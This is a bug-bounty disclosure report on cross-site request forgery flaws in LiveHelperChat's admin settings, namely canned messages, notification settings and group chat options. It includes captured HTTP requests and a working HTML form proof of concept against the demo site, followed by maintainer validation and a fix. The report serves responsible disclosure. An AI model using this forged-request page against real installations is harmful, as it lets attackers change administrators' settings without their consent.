Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat

Valid

Reported on

Jan 14th 2022


Description

A CSRF issue is found in the Settings>Live help configuration>Canned Messages. It was found that no CSRF token validation is getting done as no CSRF token is getting passed with the request. Also while generating statistics, the action is done through GET method with no CSRF token.

Two more instances were found where CSRF token validation is not being done, one in Notification settings under Settings>Live help configuration>Notification settings and the other in group chat options under Settings>Live help configuration>Group chat option.

Proof of Concept

Request for canned messages

POST /site_admin/chat/newcannedmsg HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 526
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/chat/newcannedmsg
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=5j5o8v6g4ut9ci9bsc07kuco6f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Title=abcd&Tags=abcd&ExplainHover=&Delay=0&Position=0&cannedDepartmentGroup=0&Message=&FallbackMessage=&HTMLSnippet=&MessageExtFB=&FallbackMessageExtFB=&repetitiveness=0&active_from=2022-01-13T11%3A41&active_to=2022-01-13T11%3A41&modStartTime=00%3A00&modEndTime=00%3A00&tudStartTime=00%3A00&tudEndTime=00%3A00&wedStartTime=00%3A00&wedEndTime=00%3A00&thdStartTime=00%3A00&thdEndTime=00%3A00&frdStartTime=00%3A00&frdEndTime=00%3A00&sadStartTime=00%3A00&sadEndTime=00%3A00&sudStartTime=00%3A00&sudEndTime=00%3A00&Save_action=Save

You can see that NO CSRF token is getting sent along with the request.

Another request to generate statistics is done using the GET method.

GET /site_admin/chat/cannedmsg/(tab)/statistic?doSearch=1&timefrom=&timefrom_hours=&timefrom_minutes=&timeto=&timeto_hours=&timeto_minutes=&doSearch=Generate HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/chat/cannedmsg/(tab)/statistic?doSearch=1&timefrom=&timefrom_hours=&timefrom_minutes=&timeto=&timeto_hours=&timeto_minutes=&doSearch=Generate
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Request notification settings where CSRF token validation is not being done.


POST /site_admin/notifications/settings HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/notifications/settings
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&enabled=on&subject=&http_host=demo.livehelperchat.com&icon=https%3A%2F%2Fdemo.livehelperchat.com%2Fdesign%2Fdefaulttheme%2Fimages%2Fgeneral%2Flogo.png&badge=https%3A%2F%2Fdemo.livehelperchat.com%2Fdesign%2Fdefaulttheme%2Fimages%2Fgeneral%2Flogo.png&vibrate=&public_key=%22%3E%3Cabcdddd&private_key=%22%3E%3Cabbbcd&StoreOptions=Save

Request group chat options where CSRF token validation not done


POST /site_admin/groupchat/options HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/groupchat/options
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&supervisor=3&StoreOptions=Save

Below is an example POC to exploit the above issues.

CSRF POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.livehelperchat.com/site_admin/chat/newcannedmsg" method="POST">
      <input type="hidden" name="Title" value="abcd" />
      <input type="hidden" name="Tags" value="abcd" />
      <input type="hidden" name="ExplainHover" value="" />
      <input type="hidden" name="Delay" value="0" />
      <input type="hidden" name="Position" value="0" />
      <input type="hidden" name="cannedDepartmentGroup" value="0" />
      <input type="hidden" name="Message" value="" />
      <input type="hidden" name="FallbackMessage" value="" />
      <input type="hidden" name="HTMLSnippet" value="" />
      <input type="hidden" name="MessageExtFB" value="" />
      <input type="hidden" name="FallbackMessageExtFB" value="" />
      <input type="hidden" name="repetitiveness" value="0" />
      <input type="hidden" name="active&#95;from" value="2022&#45;01&#45;13T11&#58;41" />
      <input type="hidden" name="active&#95;to" value="2022&#45;01&#45;13T11&#58;41" />
      <input type="hidden" name="modStartTime" value="00&#58;00" />
      <input type="hidden" name="modEndTime" value="00&#58;00" />
      <input type="hidden" name="tudStartTime" value="00&#58;00" />
      <input type="hidden" name="tudEndTime" value="00&#58;00" />
      <input type="hidden" name="wedStartTime" value="00&#58;00" />
      <input type="hidden" name="wedEndTime" value="00&#58;00" />
      <input type="hidden" name="thdStartTime" value="00&#58;00" />
      <input type="hidden" name="thdEndTime" value="00&#58;00" />
      <input type="hidden" name="frdStartTime" value="00&#58;00" />
      <input type="hidden" name="frdEndTime" value="00&#58;00" />
      <input type="hidden" name="sadStartTime" value="00&#58;00" />
      <input type="hidden" name="sadEndTime" value="00&#58;00" />
      <input type="hidden" name="sudStartTime" value="00&#58;00" />
      <input type="hidden" name="sudEndTime" value="00&#58;00" />
      <input type="hidden" name="Save&#95;action" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability can help an attacker to create canned messages, change notification settings and group chat options.

We are processing your report and will contact the livehelperchat team within 24 hours. 4 months ago
shubh123-tri modified the report
4 months ago
We have contacted a member of the livehelperchat team and are waiting to hear back 4 months ago
Remigijus Kiminas validated this vulnerability 4 months ago
shubh123-tri has been awarded the disclosure bounty
The fix bounty is now up for grabs
Remigijus Kiminas confirmed that a fix has been merged on c2fa19 4 months ago
The fix bounty has been dropped
Remigijus
4 months ago

Maintainer


The statistic URL was not changed. As it's gets data and does not modify it.

to join this conversation